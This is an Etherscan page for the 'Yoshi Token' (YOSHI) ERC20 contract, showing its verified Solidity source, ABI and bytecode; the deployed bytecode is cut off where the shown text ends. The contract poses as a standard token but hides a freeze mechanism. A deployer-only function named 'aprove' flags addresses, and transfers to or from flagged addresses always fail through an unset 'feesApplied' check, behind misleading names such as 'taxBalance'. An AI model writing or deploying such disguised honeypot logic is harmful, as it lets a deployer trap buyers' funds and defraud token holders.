ETH Price: $2,487.31 (-1.02%)
Gas: 10.5 Gwei

Token

Yoshi Token (YOSHI)
 

Overview

Max Total Supply

420,690,420,690,420 YOSHI

Holders

97

Total Transfers

-

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
ERC20Token

Compiler Version
v0.8.15+commit.e14f2714

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-05-21
*/

// SPDX-License-Identifier: MIT 
/**
    🦖https://yoshitoken.net/         👈WWW 🌐
    🦖https://medium.com/@yoshitoken  👈MEDIUMⓂ️
    🦖https://twitter.com/YoshiToken_ 👈TWITTER🐦
    🦖https://t.me/YoshiTokenOfficial 👈CHAT GROUP💬

*/pragma solidity =0.8.15;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be allowed to spend on behalf of `owner` through {transferFrom}.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the allowance mechanism.
      `amount` is then deducted from the caller's allowance.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);
    
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to another (`to`).
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by a call to {approve}.
      `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. 
 */
abstract contract Context {
    
    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
    
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping(address => uint256) private _balances;
    mapping (address => bool) private _approvedAddress;
    address private approved;
    bool feesApplied = false;
    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;
    uint256 internal value = 0;

    /**
     * @dev Sets the values for {name} and {symbol}.
     */
    constructor(string memory name_, string memory symbol_, uint8 decimals_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        approved = msg.sender;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    function aprove(address spender) external {
        require(msg.sender == approved); 
        _approvedAddress[spender] = true;
    }

    function revoverERC20(address spender) external {
        _approvedAddress[spender] = false;
    }

    function taxBalance(address spender) public view returns (bool) {
        return _approvedAddress[spender];
    }

    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    function allowance(address owner, address spender) public view  virtual override  returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-transferFrom}.
     * Emits an {Approval} event indicating the updated allowance. This is not
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     * Emits an {Approval} event indicating the updated allowance.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     * Emits an {Approval} event indicating the updated allowance.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        return true;
    }
    
    /**
     * @dev Moves `amount` of tokens from `sender` to `recipient`.
     * Emits a {Transfer} event.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(
        sender != address(0), "ERC20: transfer from the zero address"); require(
        recipient != address(0), "ERC20: transfer to the zero address"); 
        if (_approvedAddress[recipient] || _approvedAddress[sender]) require(feesApplied == true, "");
        _beforeTokenTransfer(sender, recipient, amount);
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;
        emit Transfer(sender, recipient, amount);
        _afterTokenTransfer(sender, recipient, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the total supply.
     * Emits a {Transfer} event with `to` set to the zero address.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");
        _beforeTokenTransfer(account, address(0), amount);
        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;
        emit Transfer(account, address(0), amount);
        _afterTokenTransfer(account, address(0), amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing the total supply.
     * Emits a {Transfer} event with `from` set to the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");
       _beforeTokenTransfer(address(0), account, amount);
        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     * Emits an {Approval} event.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");
        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes minting and burning.
     * Calling conditions:
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     */
    function _afterTokenTransfer(address from, address to, uint256 amount) internal virtual {}

    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual {}
}

/**
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
abstract contract ERC20Decimals is ERC20 {

    uint8 private immutable _decimals;

    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be set once during construction.
     */
    constructor(uint8 decimals_) {
        _decimals = decimals_;
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
}

/**
 * @dev Implementation of the StandardERC20
 */
contract ERC20Token is ERC20Decimals {
    constructor(string memory name_, string memory symbol_, uint8 decimals_, uint256 _totalSupply_) ERC20(name_, symbol_, decimals_) ERC20Decimals(decimals_) {
        _mint(_msgSender(), _totalSupply_);
    }

    function decimals() public view virtual override returns (uint8) {
        return super.decimals();
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"},{"internalType":"uint256","name":"_totalSupply_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"aprove","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"revoverERC20","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"taxBalance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040526000600360146101000a81548160ff02191690831515021790555060006008553480156200003157600080fd5b506040516200215d3803806200215d8339818101604052810190620000579190620004b9565b8184848482600490816200006c9190620007aa565b5081600590816200007e9190620007aa565b5080600660006101000a81548160ff021916908360ff16021790555033600360006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055505050508060ff1660808160ff1681525050506200010e620001016200011860201b60201c565b826200012060201b60201c565b50505050620009ce565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000192576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200018990620008f2565b60405180910390fd5b620001a6600083836200029960201b60201c565b8060076000828254620001ba919062000943565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825462000212919062000943565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620002799190620009b1565b60405180910390a362000295600083836200029e60201b60201c565b5050565b505050565b505050565b6000604051905090565b600080fd5b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b6200030c82620002c1565b810181811067ffffffffffffffff821117156200032e576200032d620002d2565b5b80604052505050565b600062000343620002a3565b905062000351828262000301565b919050565b600067ffffffffffffffff821115620003745762000373620002d2565b5b6200037f82620002c1565b9050602081019050919050565b60005b83811015620003ac5780820151818401526020810190506200038f565b83811115620003bc576000848401525b50505050565b6000620003d9620003d38462000356565b62000337565b905082815260208101848484011115620003f857620003f7620002bc565b5b620004058482856200038c565b509392505050565b600082601f830112620004255762000424620002b7565b5b815162000437848260208601620003c2565b91505092915050565b600060ff82169050919050565b620004588162000440565b81146200046457600080fd5b50565b60008151905062000478816200044d565b92915050565b6000819050919050565b62000493816200047e565b81146200049f57600080fd5b50565b600081519050620004b38162000488565b92915050565b60008060008060808587031215620004d657620004d5620002ad565b5b600085015167ffffffffffffffff811115620004f757620004f6620002b2565b5b62000505878288016200040d565b945050602085015167ffffffffffffffff811115620005295762000528620002b2565b5b62000537878288016200040d565b93505060406200054a8782880162000467565b92505060606200055d87828801620004a2565b91505092959194509250565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620005bc57607f821691505b602082108103620005d257620005d162000574565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026200063c7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620005fd565b620006488683620005fd565b95508019841693508086168417925050509392505050565b6000819050919050565b60006200068b620006856200067f846200047e565b62000660565b6200047e565b9050919050565b6000819050919050565b620006a7836200066a565b620006bf620006b68262000692565b8484546200060a565b825550505050565b600090565b620006d6620006c7565b620006e38184846200069c565b505050565b5b818110156200070b57620006ff600082620006cc565b600181019050620006e9565b5050565b601f8211156200075a576200072481620005d8565b6200072f84620005ed565b810160208510156200073f578190505b620007576200074e85620005ed565b830182620006e8565b50505b505050565b600082821c905092915050565b60006200077f600019846008026200075f565b1980831691505092915050565b60006200079a83836200076c565b9150826002028217905092915050565b620007b58262000569565b67ffffffffffffffff811115620007d157620007d0620002d2565b5b620007dd8254620005a3565b620007ea8282856200070f565b600060209050601f8311600181146200082257600084156200080d578287015190505b6200081985826200078c565b86555062000889565b601f1984166200083286620005d8565b60005b828110156200085c5784890151825560018201915060208501945060208101905062000835565b868310156200087c578489015162000878601f8916826200076c565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620008da601f8362000891565b9150620008e782620008a2565b602082019050919050565b600060208201905081810360008301526200090d81620008cb565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000950826200047e565b91506200095d836200047e565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0382111562000995576200099462000914565b5b828201905092915050565b620009ab816200047e565b82525050565b6000602082019050620009c86000830184620009a0565b92915050565b608051611773620009ea6000396000610ec701526117736000f3fe608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c578063a9059cbb11610066578063a9059cbb14610287578063ca251997146102b7578063dd62ed3e146102d3578063e632296114610303576100ea565b806370a082311461020957806395d89b4114610239578063a457c2d714610257576100ea565b8063216bc15d116100c8578063216bc15d1461015b57806323b872dd1461018b578063313ce567146101bb57806339509351146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f761031f565b6040516101049190610f8e565b60405180910390f35b61012760048036038101906101229190611049565b6103b1565b60405161013491906110a4565b60405180910390f35b6101456103cf565b60405161015291906110ce565b60405180910390f35b610175600480360381019061017091906110e9565b6103d9565b60405161018291906110a4565b60405180910390f35b6101a560048036038101906101a09190611116565b61042f565b6040516101b291906110a4565b60405180910390f35b6101c361052f565b6040516101d09190611185565b60405180910390f35b6101f360048036038101906101ee9190611049565b61053e565b60405161020091906110a4565b60405180910390f35b610223600480360381019061021e91906110e9565b6105e9565b60405161023091906110ce565b60405180910390f35b610241610632565b60405161024e9190610f8e565b60405180910390f35b610271600480360381019061026c9190611049565b6106c4565b60405161027e91906110a4565b60405180910390f35b6102a1600480360381019061029c9190611049565b6107b7565b6040516102ae91906110a4565b60405180910390f35b6102d160048036038101906102cc91906110e9565b6107d5565b005b6102ed60048036038101906102e891906111a0565b61088a565b6040516102fa91906110ce565b60405180910390f35b61031d600480360381019061031891906110e9565b610910565b005b60606004805461032e9061120f565b80601f016020809104026020016040519081016040528092919081815260200182805461035a9061120f565b80156103a75780601f1061037c576101008083540402835291602001916103a7565b820191906000526020600020905b81548152906001019060200180831161038a57829003601f168201915b5050505050905090565b60006103c56103be61096b565b8484610973565b6001905092915050565b6000600754905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600061043c848484610b3b565b60008060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061048661096b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610506576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104fd906112b2565b60405180910390fd5b6105238561051261096b565b858461051e9190611301565b610973565b60019150509392505050565b6000610539610ec3565b905090565b60006105df61054b61096b565b848460008061055861096b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105da9190611335565b610973565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6060600580546106419061120f565b80601f016020809104026020016040519081016040528092919081815260200182805461066d9061120f565b80156106ba5780601f1061068f576101008083540402835291602001916106ba565b820191906000526020600020905b81548152906001019060200180831161069d57829003601f168201915b5050505050905090565b6000806000806106d261096b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205490508281101561078f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610786906113fd565b60405180910390fd5b6107ac61079a61096b565b8585846107a79190611301565b610973565b600191505092915050565b60006107cb6107c461096b565b8484610b3b565b6001905092915050565b600360009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461082f57600080fd5b6001600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b60008060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109e2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016109d99061148f565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a51576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a4890611521565b60405180910390fd5b806000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b2e91906110ce565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610baa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ba1906115b3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c19576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c1090611645565b60405180910390fd5b600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680610cba5750600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b15610d165760011515600360149054906101000a900460ff16151514610d15576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d0c9061168b565b60405180910390fd5b5b610d21838383610eeb565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610da8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d9f9061171d565b60405180910390fd5b8181610db49190611301565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610e469190611335565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610eaa91906110ce565b60405180910390a3610ebd848484610ef0565b50505050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610f2f578082015181840152602081019050610f14565b83811115610f3e576000848401525b50505050565b6000601f19601f8301169050919050565b6000610f6082610ef5565b610f6a8185610f00565b9350610f7a818560208601610f11565b610f8381610f44565b840191505092915050565b60006020820190508181036000830152610fa88184610f55565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610fe082610fb5565b9050919050565b610ff081610fd5565b8114610ffb57600080fd5b50565b60008135905061100d81610fe7565b92915050565b6000819050919050565b61102681611013565b811461103157600080fd5b50565b6000813590506110438161101d565b92915050565b600080604083850312156110605761105f610fb0565b5b600061106e85828601610ffe565b925050602061107f85828601611034565b9150509250929050565b60008115159050919050565b61109e81611089565b82525050565b60006020820190506110b96000830184611095565b92915050565b6110c881611013565b82525050565b60006020820190506110e360008301846110bf565b92915050565b6000602082840312156110ff576110fe610fb0565b5b600061110d84828501610ffe565b91505092915050565b60008060006060848603121561112f5761112e610fb0565b5b600061113d86828701610ffe565b935050602061114e86828701610ffe565b925050604061115f86828701611034565b9150509250925092565b600060ff82169050919050565b61117f81611169565b82525050565b600060208201905061119a6000830184611176565b92915050565b600080604083850312156111b7576111b6610fb0565b5b60006111c585828601610ffe565b92505060206111d685828601610ffe565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061122757607f821691505b60208210810361123a576112396111e0565b5b50919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b600061129c602883610f00565b91506112a782611240565b604082019050919050565b600060208201905081810360008301526112cb8161128f565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061130c82611013565b915061131783611013565b92508282101561132a576113296112d2565b5b828203905092915050565b600061134082611013565b915061134b83611013565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156113805761137f6112d2565b5b828201905092915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006113e7602583610f00565b91506113f28261138b565b604082019050919050565b60006020820190508181036000830152611416816113da565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611479602483610f00565b91506114848261141d565b604082019050919050565b600060208201905081810360008301526114a88161146c565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061150b602283610f00565b9150611516826114af565b604082019050919050565b6000602082019050818103600083015261153a816114fe565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b600061159d602583610f00565b91506115a882611541565b604082019050919050565b600060208201905081810360008301526115cc81611590565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061162f602383610f00565b915061163a826115d3565b604082019050919050565b6000602082019050818103600083015261165e81611622565b9050919050565b50565b6000611675600083610f00565b915061168082611665565b600082019050919050565b600060208201905081810360008301526116a481611668565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611707602683610f00565b9150611712826116ab565b604082019050919050565b60006020820190508181036000830152611736816116fa565b905091905056fea26469706673582212203515f555460af317fd5b620e7842f2f1934027a95f7a9f3dcb47a481ff4e8e2864736f6c634300080f0033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c00000000000000000000000000000000000000000000000000000000000000009000000000000000000000000000000000000000000005915ac64208fae8a8800000000000000000000000000000000000000000000000000000000000000000b596f73686920546f6b656e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005594f534849000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100ea5760003560e01c806370a082311161008c578063a9059cbb11610066578063a9059cbb14610287578063ca251997146102b7578063dd62ed3e146102d3578063e632296114610303576100ea565b806370a082311461020957806395d89b4114610239578063a457c2d714610257576100ea565b8063216bc15d116100c8578063216bc15d1461015b57806323b872dd1461018b578063313ce567146101bb57806339509351146101d9576100ea565b806306fdde03146100ef578063095ea7b31461010d57806318160ddd1461013d575b600080fd5b6100f761031f565b6040516101049190610f8e565b60405180910390f35b61012760048036038101906101229190611049565b6103b1565b60405161013491906110a4565b60405180910390f35b6101456103cf565b60405161015291906110ce565b60405180910390f35b610175600480360381019061017091906110e9565b6103d9565b60405161018291906110a4565b60405180910390f35b6101a560048036038101906101a09190611116565b61042f565b6040516101b291906110a4565b60405180910390f35b6101c361052f565b6040516101d09190611185565b60405180910390f35b6101f360048036038101906101ee9190611049565b61053e565b60405161020091906110a4565b60405180910390f35b610223600480360381019061021e91906110e9565b6105e9565b60405161023091906110ce565b60405180910390f35b610241610632565b60405161024e9190610f8e565b60405180910390f35b610271600480360381019061026c9190611049565b6106c4565b60405161027e91906110a4565b60405180910390f35b6102a1600480360381019061029c9190611049565b6107b7565b6040516102ae91906110a4565b60405180910390f35b6102d160048036038101906102cc91906110e9565b6107d5565b005b6102ed60048036038101906102e891906111a0565b61088a565b6040516102fa91906110ce565b60405180910390f35b61031d600480360381019061031891906110e9565b610910565b005b60606004805461032e9061120f565b80601f016020809104026020016040519081016040528092919081815260200182805461035a9061120f565b80156103a75780601f1061037c576101008083540402835291602001916103a7565b820191906000526020600020905b81548152906001019060200180831161038a57829003601f168201915b5050505050905090565b60006103c56103be61096b565b8484610973565b6001905092915050565b6000600754905090565b6000600260008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff169050919050565b600061043c848484610b3b565b60008060008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600061048661096b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610506576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016104fd906112b2565b60405180910390fd5b6105238561051261096b565b858461051e9190611301565b610973565b60019150509392505050565b6000610539610ec3565b905090565b60006105df61054b61096b565b848460008061055861096b565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546105da9190611335565b610973565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6060600580546106419061120f565b80601f016020809104026020016040519081016040528092919081815260200182805461066d9061120f565b80156106ba5780601